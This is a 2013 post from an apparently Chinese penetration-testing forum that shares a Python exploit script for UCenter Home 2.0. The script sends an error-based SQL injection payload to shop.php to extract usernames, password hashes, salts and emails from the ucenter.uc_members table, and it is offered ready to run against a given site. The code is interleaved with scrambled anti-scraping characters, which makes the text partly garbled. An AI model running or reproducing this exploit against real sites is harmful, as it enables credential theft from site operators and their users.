找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1957|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl$ D& d6 [' P) X" @. ~
  f7 E* w, Q# a" W8 [
$ v8 L/ s8 O8 B% l8 k- e$ n0 f
#!/usr/bin/env python  
" j" o# O4 ^! C/ t+ _' M! ]
0 |1 d  U. D- P9 kimport sys  
8 M& d' X' `2 M! Q( q/ i. {+ H6 Fimport urllib2  8 i# x1 K* [) N  k7 t4 w2 E
import re  
8 A4 M  f& f. R7 `/ T 9 \9 P7 q' T1 d7 ^2 I6 [4 y
def info():  
& x8 S1 X6 y$ @    print 'From:http://www.exploit-db.com/exploits/14997/'
; y2 V! ?5 ?0 V4 P- i, k2 J+ X3 i    print 'http://www.hake.cc/Web_loudong/' 6 V/ W# G+ Y5 J; Y3 m
    print 'changed:qiaoy'  : [- I2 o2 A: j3 ^3 m
    print 'exp:'  8 K; t8 X" J7 ]) \7 A$ h
    print ' ./UCenter_Home_2.0.py site'  & O1 N" U7 Z2 ~; Y

. e% {" g4 O4 P4 @5 w3 Kdef main():  ; `, T( `. B# [
    if len(sys.argv) != 2:    [  I% l4 p% H) f: W% x: U6 L
        info()  
, m0 B4 l8 Z( O2 X; J$ E+ O    else:  
9 @7 j$ M, S5 m( |        site = sys.argv[1]  ( v. p  }" Q  ^" x
        if site[0:7] == 'http://':  
3 ?( ~: z: [$ y+ E) U3 l2 Z            sitesite =site  
9 j8 _* q2 u' k' t        elif site[0:8] == 'https://':  
4 }8 a3 e+ s1 @            sitesite = site  
" p5 a* n' @3 K% G: G" ^- h2 {  @        else:  . ]. W1 F3 z9 O9 v8 Y7 @
            site = 'http://'+site  ! K! t; z! S( z: q) X7 i' W
        try:  
# {; V& Y0 e7 w' P            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
1 H' O4 j. H# c3 s            Value = urllib2.urlopen(url).read()  2 _/ ~. ?0 b* q) D" @3 o& [
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
3 H3 I5 J( I/ h! l) l& \            hacked = Msg.split(':')  7 B4 C# u0 D: k2 X/ I; y
            print 'Name:    '+hacked[1]  , q' ^0 e9 ?' f% X0 v# A. I- B
            print 'Passwd:  '+hacked[2]  " `* B3 |/ W" v1 V+ G' Y& n
            print 'salt:    '+hacked[3]  
5 z8 c# _0 N0 l            print 'email:   '+hacked[4]  ) \6 o2 A9 M; n1 u! B
        except:  
: S# w. E% Z1 C: ~4 s% e9 O            print 'Sorry,I can\'t work............'  9 ?" i& A  l' _. A

0 s* k$ @0 Z! Q$ B" pif __name__ == '__main__':  
  z; W2 J/ Z# u2 E    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表